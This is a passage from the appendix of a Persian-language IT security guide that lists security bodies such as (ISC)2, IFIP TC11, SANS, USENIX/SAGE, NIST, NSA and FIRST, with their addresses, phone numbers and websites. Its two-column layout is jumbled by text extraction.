‫‪ IEEE‬ﻣﺤﺴﻮﺏ ﻣﻲ ﺷﻮﺩ‪ .‬ﺍﺯ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺍﻳﻦ ﺟﺎﻣﻌﻪ ﻣﻲﺗﻮﺍﻥ ﺑﻪ‬ ‫ﺳﺎﺯﻣﺎﻧﻲ ﺑـﻴﻦ ﺍﻟﻤﻠﻠـﻲ ﻛـﻪ ﺑـﺮ ﺍﺭﺍﺋـﻪ ﮔـﻮﺍﻫﻲﻫـﺎﻱ ﺗﺨﺼـﺼﻲ‬
‫ﻛﺎﺭﻫﺎﻳﻲ ﻧﻈﻴﺮ ﺗﻼﺵ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﻧﺸﺮﻳﺎﺕ ﭘﮋﻭﻫﺸﻲ‪ ،‬ﺑﺮﮔﺰﺍﺭﻱ‬ ‫‪ ٥٢٩CISSP‬ﻭ ‪ ٥٣٠SSCP‬ﻧﻈﺎﺭﺕ ﻣﻲﻛﻨﺪ‪ .‬ﺍﻳﻦ ﺩﻭ ﮔﻮﺍﻫﻲ ﺑـﻪ‬
‫ﻛﻨﻔﺮﺍﻧﺴﻬﺎ ﻭ ﻛﺎﺭﮔﺎﻫﻬـﺎ‪ ،‬ﺍﺭﺍﺋـﻪ ﺁﻣﻮﺯﺷـﻬﺎﻱ ﺗﺨﺼـﺼﻲ‪ ،‬ﺗـﺪﻭﻳﻦ‬ ‫ﻋﻨﻮﺍﻥ ﻳﻚ ﺳﻄﺢ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺑﺮﺍﻱ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺩﺭ ﺯﻣﻴﻨـﺔ ﺍﻣﻨﻴـﺖ‬
‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻓﻨﻲ ﻭ ﻓﻌﺎﻟﻴﺘﻬﺎﻳﻲ ﺍﺯ ﺍﻳﻦ ﻗﺒﻴﻞ ﺍﺷﺎﺭﻩ ﻛـﺮﺩ‪ .‬ﺍﻳـﻦ‬ ‫ﻻ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﺍﻃﻼﻋﺎﺕ ﻓﻌﺎﻟﻴﺖ ﻣﻲﻛﻨﻨﺪ ﻣﺤﺴﻮﺏ ﻣﻲﺷﻮﻧﺪ‪ .‬ﻣﻌﻤﻮ ﹰ‬
‫ﺟﺎﻣﻌﻪ ﻫﻤﭽﻨﻴﻦ ﺩﺍﺭﺍﻱ ﮔﺮﻭﻫﻬﺎﻱ ﺗﺨﺼﺼﻲ ﻧﻴﺰ ﻫـﺴﺖ ﻛـﻪ ﺍﺯ‬ ‫ﻫﻨﮕﺎﻡ ﺍﺳﺘﺨﺪﺍﻡ ﻣﺘﺨﺼـﺼﻴﻦ ﻭ ﭘـﺲ ﺍﺯ ﺗﻮﻓﻴـﻖ ﻣﺘﻘﺎﺿـﻴﺎﻥ ﺩﺭ‬
‫ﺁﻥ ﺟﻤﻠﻪﺍﻧﺪ ﻛﻤﻴﺘﺔ ﻓﻨﻲ ﺍﻣﻨﻴﺖ ﻭ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ‪ ،‬ﻛﻤﻴﺘﺔ ﻓﻨـﻲ‬ ‫ﺁﺯﻣﻮﻧﻬﺎﻱ ﺍﻭﻟﻴﺔ ﺍﺳﺘﺨﺪﺍﻣﻲ‪ ،‬ﺍﺯ ﺍﻓﺮﺍﺩ ﺍﻳﻦ ﮔﻮﺍﻫﻲﻫﺎ ﺭﺍ ﺩﺭﺧﻮﺍﺳﺖ‬
‫ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﻭ ﻧﻴﺰ ﻛﻤﻴﺘﺔ ﻓﻨﻲ ﻣﻬﻨﺪﺳﻲ ﻧﺮﻡﺍﻓﺰﺍﺭ‪.‬‬ ‫ﻣﻲﻛﻨﻨﺪ ﺗﺎ ﺳﻄﺢ ﺩﺍﻧﺶ ﺁﻧﺎﻥ ﻣﺸﺨﺺ ﺑﻴﺶ ﺍﺯ ﭘﻴﺶ ﻣـﺸﺨﺺ‬
‫ﺷﻮﺩ‪.‬‬
‫‪IEEE Computer Society‬‬ ‫‪(ISC)2 Services‬‬
‫‪1730 Massachusetts Avenue N.W.‬‬ ‫‪P.O.Box 1117‬‬
‫‪Washington, DC 20036-1992‬‬ ‫‪Dunedin, FL 34697‬‬
‫‪+1-202-371-0101‬‬ ‫‪USA‬‬
‫‪http://www.computer.org‬‬ ‫‪+1-888-333-4458‬‬
‫‪http://www.isc2.org‬‬
‫ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻛﻤﻴﺘﺔ ﻓﻨﻲ ﺍﻣﻨﻴﺖ ﻭ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺍﻳﻦ ﺟﺎﻣﻌﻪ‪ ،‬ﭼﻨﺪ‬
‫ﻣﻨﺒﻊ ﺍﻃﻼﻋﺎﺗﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ؛ ﺍﺯ ﺟﻤﻠﻪ ﻳﻚ ﺧﺒﺮﻧﺎﻣﻪ‪:‬‬ ‫‪(ISC)2 Europe Operations‬‬
‫‪Nestor House‬‬
‫‪http://www.ieee-security.org/‬‬ ‫‪London UK EC4V 5EX‬‬
‫‪+44 (0) 20 7779 8030‬‬
‫‪٥٣٣‬‬
‫ﻛﻤﻴﺘﺔ ﻓﻨﻲ ﺷﻤﺎﺭﺓ ‪IFIP ۱۱‬‬
‫‪(ISC)2 Asia Operations‬‬
‫ﻛﻤﻴﺘﺔ ﻓﻨﻲ ﺷﻤﺎﺭﺓ ‪ ۱۱‬ﻓﺪﺭﺍﺳﻴﻮﻥ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﭘﺮﺩﺍﺯﺵ ﺍﻃﻼﻋﺎﺕ‬ ‫‪17/F., Printing House‬‬
‫)‪ (IFIP‬ﻣﺨﺘﺺ ﺗﺤﻘﻴﻖ‪ ،‬ﺁﻣﻮﺯﺵ‪ ،‬ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺩﺭ ﺯﻣﻴﻨـﺔ ﺍﻣﻨﻴـﺖ‬ ‫‪Central Hong Kong‬‬
‫‪+852 2111 6612‬‬
‫ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋــﺎﺗﻲ ﺍﺳــﺖ‪ .‬ﮔﺮﻭﻫﻬــﺎﻱ ﻛــﺎﺭﻱ ﻛﻤﻴﺘــﻪ‬
‫‪٥٣١‬‬
‫ﺳﺮﭘﺮﺳﺘﻲ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﺨﺘﻠﻔﻲ ﺭﺍ ﺑﺮ ﻋﻬﺪﻩ ﺩﺍﺭﻧﺪ‪ ،‬ﻣﺜﻞ ﺑﺮﮔـﺰﺍﺭﻱ‬ ‫ﺟﺎﻣﻌﺔ ﺍﻳﻨﺘﺮﻧﺘﻲ‬
‫ﻛﻨﻔﺮﺍﻧﺲ ﺩﺭ ﻧﻘﻄﻪﺍﻱ ﺍﺯ ﺩﻧﻴﺎ‪.‬‬
‫‪http://www.ifip.org‬‬ ‫ﺑﻴﺸﺘﺮ ﻓﻌﺎﻟﻴﺘﻬﺎ ﻭ ﺭﻭﻳﺪﺍﺩﻫﺎﻱ ﻣﺮﺗﺒﻂ ﺑﺎ ﺍﻳﻨﺘﺮﻧـﺖ ﺍﺯ ﺟﻤﻠـﻪ ﻳـﻚ‬
‫ﺑﺨﺶ ﺷﺸﻢ‬

‫)ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻓﻮﻕ ﺑﻪ ﺻﻔﺤﺎﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻳﺎ ‪ TC 11‬ﺑﺮﻭﻳﺪ‪(.‬‬ ‫ﻫﻤﺎﻳﺶ ﺳﺎﻻﻧﻪ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ ﺭﺍ ﺑﺮﮔﺰﺍﺭ ﻣﻲﻛﻨﺪ‪.‬‬

‫‪1775 Wiehle Ave., Suite 102‬‬

‫‪528 International Information Systems Security‬‬


‫‪532 IEEE Computer Society‬‬ ‫‪Certification Consortium, Inc.‬‬
‫‪533 International Federation for Information Processing‬‬ ‫‪529 Certified Information Systems Security Professional‬‬
‫‪- Technical Committee 11‬‬ ‫‪530 Systems Security Certified Practitioner‬‬
‫‪531 The Internet Society‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٤٩٢‬‬

‫‪٥٣٤‬‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘﻲ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ‬ ‫‪) SANS‬ﻣﺆﺳﺴﻪ ﺭﺍﻫﺒﺮﻱ ﺳﻴﺴﺘﻤﻬﺎ ﻭ ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ(‬

‫‪٥٣٧‬‬
‫‪) NIST‬ﻣﺆﺳﺴﻪ ﻣﻠﻲ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻭ ﻓﻨﺎﻭﺭﻱ(‬ ‫ﻣﺆﺳﺴﻪﺍﻱ ﻛﻪ ﻛﺎﺭﮔﺎﻫﻬﺎ ﻭ ﻛﻨﻔﺮﺍﻧـﺴﻬﺎﻳﻲ ﺭﺍ ﺩﺭ ﻧﻘـﺎﻁ ﻣﺨﺘﻠـﻒ‬
‫ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺑﺮﮔﺰﺍﺭ ﻣﻲﻛﻨـﺪ ﺗـﺎ ﺩﺭ ﺍﺑﻌـﺎﺩ ﻣﺨﺘﻠـﻒ ﺍﻣﻨﻴـﺖ ﻭ‬
‫ﺍﻳﻦ ﻣﺆﺳﺴﻪ )ﻛﻪ ﺳﺎﺑﻘﹰﺎ ﺍﺩﺍﺭﻩ ﻣﻠﻲ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ‪ ٥٣٨‬ﻧﺎﻡ ﺩﺍﺷﺖ(‪ ،‬ﻣﺴﺌﻮﻟﻴﺖ‬ ‫ﺭﺍﻫﺒﺮﻱ ﺳﻴﺴﺘﻤﻬﺎ ﺁﻣﻮﺯﺵ ﻣﺴﺘﻤﺮ ﻓﺮﺍﻫﻢ ﻛﺮﺩﻩ ﺑﺎﺷﺪ‪ .‬ﺍﺯ ﺟﻤﻠـﺔ‬
‫ﺗــﺪﻭﻳﻦ ﺍﺳــﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﻣﻨﻴــﺖ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﻭ ﺭﻭﺷــﻬﺎﻱ ﺍﺭﺯﻳــﺎﺑﻲ‬ ‫ﺩﻭﺭﻩﻫــﺎﻱ ﺁﻣﻮﺯﺷــﻲ ﻣــﻲﺗــﻮﺍﻥ ﺑــﻪ ﺁﻣﻮﺯﺷــﻬﺎﻳﻲ ﺩﺭ ﺧــﺼﻮﺹ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ ﻣﻨﻔـﻚ ﺍﺯ ﻭﺯﺍﺭﺕ ﺩﻓـﺎﻉ ﺭﺍ ﺑﺮﻋﻬـﺪﻩ ﺩﺍﺭﺩ‪.‬‬ ‫ﻣﻬﺎﺟﻢﻳﺎﺏ‪ ،‬ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻭ ﺍﻣﻨﻴـﺖ ﻋﻤـﻮﻣﻲ ﺍﺷـﺎﺭﻩ ﻛـﺮﺩ‪ .‬ﺍﻳـﻦ‬
‫ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺍﻳﻦ ﻣﺆﺳﺴﻪ ﻋﻼﻭﻩ ﺑـﺮ ﺗـﺪﻭﻳﻦ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎ‪ ،‬ﺷـﺎﻣﻞ‬ ‫ﺳﺎﺯﻣﺎﻥ ﻫﻤﭽﻨﻴﻦ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺧﻮﺩ ﺧﺒﺮﻧﺎﻣﻪﻫـﺎ‪ ،‬ﻫـﺸﺪﺍﺭﻫـﺎ ﻭ‬
‫ﺗﺤﻘﻴﻘﺎﺕ ﻧﻴﺰ ﻣﻲﺷﻮﺩ‪.‬‬ ‫ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎﻱ ﺧﻮﺩﺁﻣﻮﺯ ﻣﺨﺘﻠﻔﻲ ﺭﺍ ﻣﻨﺘﺸﺮ ﻣﻲﻛﻨﺪ‪.‬‬

‫‪NIST Computer Security Division‬‬ ‫‪http://www.sans.org‬‬


‫‪100 Bureau Drive‬‬
‫‪Mail Stop 8930‬‬ ‫‪USENIX/SAGE‬‬
‫‪Gaithersburg, MD 20899-8930‬‬
‫‪+1-301-975-2934‬‬ ‫ﺍﻧﺠﻤﻦ ‪ USENIX‬ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﺁﻣﻮﺯﺷـﻲ ﻏﻴﺮﺍﻧﺘﻔـﺎﻋﻲ ﺑـﺮﺍﻱ‬
‫‪http://www.nist.gov‬‬ ‫ﻛﺎﺭﺑﺮﺍﻥ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ Unix‬ﻭ ﺍﻣﺜﺎﻝ ﺁﻥ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﺍﻧﺠﻤﻦ ﻳﻚ‬
‫ﻧــﺸﺮﻳﻪ ﻣﻨﺘــﺸﺮ ﻣــﻲﻛﻨــﺪ‪ ،‬ﺩﺭ ﺑﺮﮔــﺰﺍﺭﻱ ﻛﻨﻔﺮﺍﻧــﺴﻬﺎ ﻣــﺸﺎﺭﻛﺖ‬
‫ﺍﻳﻦ ﻣﺆﺳﺴﻪ ﻣﺮﻛـﺰﻱ ﺑـﻪ ﻧـﺎﻡ ﻣﺮﻛـﺰ ﻣﻨـﺎﺑﻊ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ‬ ‫ﻣــﻲﺟﻮﻳــﺪ‪ ،‬ﻭ ﺩﺭ ﺑﺪﻧــﻪﻫــﺎﻱ ﺑــﻴﻦﺍﻟﻤﻠﻠــﻲ ﺍﺳــﺘﺎﻧﺪﺍﺭﺩ‪ ٥٣٥‬ﺩﺍﺭﺍﻱ‬
‫)‪ ٥٣٩(CSRC‬ﺭﺍ ﻧﻴﺰ ﺍﺩﺍﺭﻩ ﻣﻲﻛﻨﺪ‪:‬‬ ‫ﻧﻤﺎﻳﻨﺪﮔﻲ ﻣﻲﺑﺎﺷﺪ‪ ،‬ﻭ ﺍﺯ ﺑﺮﮔﺰﺍﺭﻱ ﻛﺎﺭﮔﺎﻫﻬﺎﻱ ﺳﺎﻻﻧﻪ ﺩﺭ ﺍﺭﺗﺒﺎﻁ‬
‫ﺑﺎ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ Unix‬ﻭ ﻧﻴﺰ ﺩﻳﮕﺮ ﻛﺎﺭﮔﺎﻫﻬـﺎﻱ ﺭﺍﻫﺒـﺮﻱ‬
‫‪http://csrc.nist.gov/‬‬
‫ﺳﻴﺴﺘﻤﻬﺎ ﻭ ﻛﻨﻔﺮﺍﻧﺴﻬﺎﻱ ﻣﺮﺗﺒﻂ ﺑﺎ ﺍﻃﻼﻋـﺎﺕ ﺍﻣﻨﻴﺘـﻲ ﺣﻤﺎﻳـﺖ‬
‫‪٥٤٠‬‬ ‫ﻣﻲﻛﻨﺪ‪ .‬ﺍﺯ ﺟﻤﻠﺔ ﺍﻳﻦ ﻛﺎﺭﮔﺎﻫﻬﺎ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﻳﻚ ﻛﺎﺭﮔﺎﻩ ﺳـﺎﻻﻧﻪ‬
‫‪) NSA‬ﺳﺎﺯﻣﺎﻥ ﺍﻣﻨﻴﺖ ﻣﻠﻲ(‬
‫ﺍﻳﻦ ﺳﺎﺯﻣﺎﻥ ﻳﻚ ﻓﻬﺮﺳﺖ ﺍﺯ ﻣﺤﺼﻮﻻﺗﻲ ﻛﻪ ﺍﺭﺯﻳـﺎﺑﻲ ﻭ ﺗﺄﻳﻴـﺪ‬ ‫ﺩﺭ ﺯﻣﻴﻨــﺔ ﺍﻣﻨﻴــﺖ ‪ ،Unix‬ﻳــﻚ ﻛﺎﺭﮔــﺎﻩ ﺳــﺎﻻﻧﻪ ﺩﺭ ﺧــﺼﻮﺹ‬
‫ﺷﺪﻩﺍﻧﺪ ﺩﺍﺭﺩ ﻛﻪ ﺩﺭ ﺁﻥ ﻣﻘﺪﺍﺭﻱ ﻣﻨﺎﺑﻊ ﺍﻃﻼﻋﺎﺕ ﻓﻨـﻲ ﺩﺭ ﺯﻣﻴﻨـﺔ‬ ‫ﺭﺍﻫﺒــﺮﻱ ﺳﻴــﺴﺘﻢ‪ ،‬ﺑﻌــﻼﻭﺓ ﻛﻨﻔﺮﺍﻧــﺴﻬﺎﻱ ﻣﺘﻌــﺪﺩ ﺩﻳﮕــﺮﻱ ﺑــﺎ‬
‫ﺍﻣﻨﻴﺖ ﺑﻮﻳﮋﻩ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻣﻮﺟﻮﺩ ﺍﺳـﺖ‪ .‬ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻛـﺎﺭﺑﺮﺍﻥ‬ ‫ﻣﻮﺿﻮﻋﺎﺕ ﻣﺮﺗﺒﻂ ﺑﺎ ﺍﻣﻨﻴﺖ ﺍﺷﺎﺭﻩ ﻛﺮﺩ‪.‬‬
‫‪ Linux‬ﺑــﻪ ﺑﺮﻧﺎﻣــﺔ "‪ Linux‬ﺍﻳﻤــﻦ ‪ - "NSA‬ﻣﺠﻤﻮﻋــﻪﺍﻱ ﺍﺯ‬
‫‪ SAGE‬ﻣﺨﻔﻒ ﻋﺒﺎﺭﺕ ﺍﻧﺠﻤﻦ ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻤﻬﺎ‪ ٥٣٦‬ﺍﺳـﺖ‪ ،‬ﻭ‬
‫ﻭﺻﻠﻪﻫﺎﻱ ﻫﺴﺘﺔ ﺳﻴﺴﺘﻢﻋﺎﻣـﻞ ﻛـﻪ ﺳـﻄﺢ ﺍﻣﻨﻴـﺖ ‪ Linux‬ﺭﺍ‬
‫ﻳﻚ ﮔﺮﻭﻩ ﻓﻨﻲ ﺗﺨﺼﺼﻲ ﺍﺯ ﺍﻧﺠﻤﻦ ‪ USENIX‬ﻣﻲﺑﺎﺷﺪ‪ .‬ﺑﺮﺍﻱ‬
‫ﺍﻓﺰﺍﻳﺶ ﻣﻲﺩﻫﺪ ‪ -‬ﻋﻼﻗﻪﻣﻨـﺪ ﺑﺎﺷـﻨﺪ‪ NSA .‬ﻫﻤﭽﻨـﻴﻦ ﻣـﻮﺯﺓ‬
‫ﻋﻀﻮﻳﺖ ﺩﺭ ‪ ،SAGE‬ﺑﺎﻳـﺪ ﭘﻴـﺸﺘﺮ ﺑـﻪ ﻋـﻀﻮﻳﺖ ‪USENIX‬‬
‫ﻣﻠﻲ ﺭﻣﺰﻧﮕﺎﺭﻱ‪ ٥٤١‬ﺩﺭ ﻣﺮﻳﻠﻨﺪ‪ ٥٤٢‬ﺭﺍ ﺍﺩﺍﺭﻩ ﻣﻲﻛﻨﺪ‪ ،‬ﻭ ﻳـﻚ ﻣـﻮﺯﺓ‬
‫ﺩﺭ ﺁﻣﺪﻩ ﺑﺎﺷﻴﺪ‪.‬‬
‫ﺭﻣﺰﻧﮕــﺎﺭﻱ ﻧﻴــﺰ ﺩﺭ ﺍﻳﻨﺘﺮﻧــﺖ ﺩﺍﺭﺩ‪ .‬ﺁﺩﺭﺱ ﭘﺎﻳﮕــﺎﻩ ﻭﺏ ‪NSA‬‬
‫ﻋﺒﺎﺭﺕ ﺍﺳﺖ ﺍﺯ‪:‬‬ ‫‪USENIX Association‬‬
‫‪2560 Ninth Street‬‬
‫‪http://www.nsa.gov‬‬ ‫‪Suite215‬‬
‫‪Berekley, CA 94710‬‬
‫ﺩﺭ ﺍﻳــﻦ ﭘﺎﻳﮕــﺎﻩ ﻭﺏ ﭼﻨــﺪ ﺭﺍﻫﻨﻤــﺎﻱ ﻣﻔﻴــﺪ ﺑــﺮﺍﻱ ﭘﻴﻜﺮﺑﻨــﺪﻱ‬ ‫‪+1-510-528-8649‬‬
‫‪office@usenix.org‬‬
‫ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ ﻭ ﻣﺴﻴﺮﻳﺎﺑﻬﺎﻱ ﺭﺍﻳﺞ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺍﻳـﻦ ﺭﺍﻫﻨﻤﺎﻫـﺎ‬ ‫‪http://www.usenix.org‬‬

‫‪537 National Institute of Standards and Technology‬‬


‫‪538 National Bureau of Standards‬‬
‫‪539 Computer Security Resource Center‬‬
‫‪540 National Security Agency‬‬ ‫‪534 Systems Administration and Network Security‬‬
‫‪541 National Cryptologic Museum‬‬ ‫‪535 International Standards Bodies‬‬
‫‪542 Maryland‬‬ ‫‪536 Systems Administrators Guild‬‬
‫‪٤٩٣‬‬ ‫ﭘﻴﻮﺳﺘﻬﺎ‬

‫‪National Infrastructure Protection Center‬‬ ‫ﻧﻜﺎﺕ ﻣﻔﻴﺪﻱ ﺑﺮﺍﻱ ﺗﻐﻴﻴﺮ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻣﻌﻤﻮﻝ ﺍﺭﺍﺋﻪ ﻣـﻲﻛﻨﻨـﺪ ﺗـﺎ‬
‫‪J.Edgar Hoover Building‬‬ ‫ﺿﺮﻳﺐ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢ ﺍﻓﺰﺍﻳﺶ ﻳﺎﺑﺪ‪.‬‬
‫‪935 Pennsylvania Avenue, NW‬‬
‫‪Washington, D.C.20535-0001‬‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻭﺍﻛﻨﺶ ﺑﻪ ﻓﻮﺭﻳﺘﻬﺎ‬
‫‪+1-202-323-3205‬‬
‫‪http://www.nipc.gov‬‬
‫ﻭﺯﺍﺭﺕ ﺩﺍﺩﮔﺴﺘﺮﻱ‪ FBI ،‬ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺧﺪﻣﺎﺕ ﺳـﺮ‪‬ﻱ ﺍﻳـﺎﻻﺕ‬
‫‪٥٤٦‬‬
‫‪) USSS‬ﺧﺪﻣﺎﺕ ﺳﺮ‪‬ﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ(‬ ‫ﻣﺘﺤﺪﻩ ﻛﻪ ﺩﺭ ﺍﺩﺍﻣﻪ ﺁﻣﺪﻩﺍﻧـﺪ‪ ،‬ﻧﻘـﺾ ﻗـﻮﺍﻧﻴﻦ ﻣﻠـﻲ ﻣﺮﺑـﻮﻁ ﺑـﻪ‬
‫ﻛﻼﻫﺒﺮﺩﺍﺭﻱ‪ ،‬ﺳـﺮﻗﺖ‪ ،‬ﻭ ﺳـﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻨـﺎﺑﻊ ﺭﺍﻳﺎﻧـﻪ ﺍﻱ ﺭﺍ‬
‫‪Financial Crimes Division‬‬
‫ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺗﻴﻤﻬﺎﻱ ﻭﺍﻛﻨﺶ ﺑـﻪ ﺭﺧـﺪﺍﺩ ﻣﺘﻌـﺪﺩ ﺍﺯ ﺟﻤﻠـﻪ‬
‫‪Electronic Crime Branch‬‬
‫‪U.S. Secret Service‬‬ ‫‪ FIRST‬ﻧﻴﺰ ﺑﻪ ﺗﺤﻘﻴﻖ ﺻﺮﻑ ﺩﺭ ﺧـﺼﻮﺹ ﺟـﺮﺍﺋﻢ ﺭﺍﻳﺎﻧـﻪﺍﻱ‬
‫‪Washington, DC 20223‬‬ ‫ﻧﻤﻲ ﭘﺮﺩﺍﺯﻧﺪ ؛ ﺑﻠﻜﻪ ﻫﻨﮕﺎﻡ ﻭﻗﻮﻉ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺑـﻪ ﻛﻤـﻚ‬
‫‪+1-202-435-7700‬‬ ‫ﻗﺮﺑﺎﻧﻴﺎﻥ ﻣﻲﺷﺘﺎﺑﻨﺪ؛ ﻭ ﻫﻤﭽﻨﻴﻦ ﺑﺮﺍﻱ ﻛﺎﻫﺶ ﺍﻣﻜﺎﻥ ﻭﻗﻮﻉ ﻭ ﻳـﺎ‬
‫‪http://www.ustreas.gov/usss/financial_crimes.shtml‬‬
‫ﮔــﺴﺘﺮﺵ ﺍﻳــﻦ ﻭﻗــﺎﻳﻊ ﺑــﻪ ﺗﺤﻘﻴــﻖ‪ ،‬ﺍﺭﺍﺋــﻪ ﺍﻃﻼﻋــﺎﺕ ﻭ ﺍﻧﺠــﺎﻡ‬
‫‪) FIRST‬ﺍﺗﺎﻕ ﮔﻔﺘﮕـﻮﻱ ﺗﻴﻤﻬـﺎﻱ ﻭﺍﻛـﻨﺶ ﺑـﻪ ﺭﺧـﺪﺍﺩﻫﺎﻱ‬ ‫ﭘﺸﺘﻴﺒﺎﻧﻲ ﻧﻴﺰ ﻣﻲﭘﺮﺩﺍﺯﻧﺪ‪.‬‬
‫‪٥٤٧‬‬
‫ﺍﻣﻨﻴﺘﻲ(‬
‫ﻻ ﺩﺍﺭﺍﻱ ﺩﻓـﺎﺗﺮ‬
‫ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛـﻪ ﻣﺆﺳـﺴﺎﺕ ﻣﻠـﻲ ﻣﻌﻤـﻮ ﹰ‬
‫ﺍﻳﻦ ﻣﺠﻤﻊ ﺩﺭ ﻣﺎﺭﺱ ‪ ۱۹۹۳‬ﺗﺄﺳـﻴﺲ ﺷـﺪ‪ FIRST .‬ﺍﺋﺘﻼﻓـﻲ‬ ‫ﺣﻮﺯﻩ ﺍﻱ )ﻣﺤﻠﻲ( ﻣﻲ ﺑﺎﺷـﻨﺪ ﻛـﻪ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺍﺯ ﺁﻧﻬـﺎ ﺍﻃﻼﻋـﺎﺕ‬
‫ﺍﺳﺖ ﻛﻪ ﺗﻴﻤﻬﺎﻱ ﻣﺨﺘﻠﻒ ﻭﺍﻛـﻨﺶ ﺑـﻪ ﺭﺧـﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺍﺯ‬ ‫ﺍﺧﺘﺼﺎﺻﻲﺗﺮﻱ ﺩﺭﻳﺎﻓﺖ ﻛﻨﻴﺪ؛ ﻫﺮﭼﻨﺪ ﺗﻤﺎﻡ ﺩﻓﺎﺗﺮ ﻣﺤﻠﻲ ﻣﺠﻬـﺰ‬
‫ﺑﺨﺶ ﺩﻭﻟﺘﻲ ﻭ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﻭ ﻫﻤﭽﻨﻴﻦ ﺩﺍﻧـﺸﮕﺎﻫﻬﺎ ﺭﺍ ﺩﺭ‬ ‫ﺑﻪ ﻛﺎﺭﻛﻨﺎﻧﻲ ﺑﺎ ﺳـﻄﺢ ﺁﻣﻮﺯﺷـﻲ ﻫﻤـﺴﺎﻥ ﺑـﺎ ﻛﺎﺭﻛﻨـﺎﻥ ﺩﻓـﺎﺗﺮ‬
‫ﻛﻨــﺎﺭ ﻫــﻢ ﻗــﺮﺍﺭ ﺩﺍﺩﻩ ﺍﺳــﺖ‪ .‬ﻣﺆﺳــﺴﻴﻦ ‪ FIRST‬ﺍﺯ ﺗﻴﻤﻬــﺎﻱ‬ ‫ﻣﺮﻛﺰﻱ ﻧﻴﺴﺘﻨﺪ‪.‬‬
‫ﻭﺍﻛﻨﺶ ﺑﻪ ﺭﺧﺪﺍﺩ ﻣﺘﻌﺪﺩﻱ ﺩﺭ ﺗﻤـﺎﻡ ﺩﻧﻴـﺎ ﮔـﺮﺩ ﻫـﻢ ﺁﻣـﺪﻩﺍﻧـﺪ‪.‬‬ ‫‪٥٤٣‬‬
‫‪) DOJ‬ﻭﺯﺍﺭﺕ ﺩﺍﺩﮔﺴﺘﺮﻱ(‬
‫ﺍﻫﺪﺍﻑ ‪ FIRST‬ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ‪:‬‬
‫‪10th & Constitutioan Ave. NW‬‬
‫ﺍﻓﺰﺍﻳﺶ ﻫﻤﻜﺎﺭﻱ ﻣﻴﺎﻥ ﻛﺎﺭﺑﺮﺍﻥ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺟﻬـﺖ‬ ‫•‬ ‫& ‪Criminal Division, (Computer Crime‬‬
‫ﻣﻘﺎﺑﻠﻪ‪ ،‬ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺗﺮﻣﻴﻢ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ؛‬ ‫)‪Intellectual Property Section‬‬
‫‪John C.Keeney Building, Suite 600‬‬
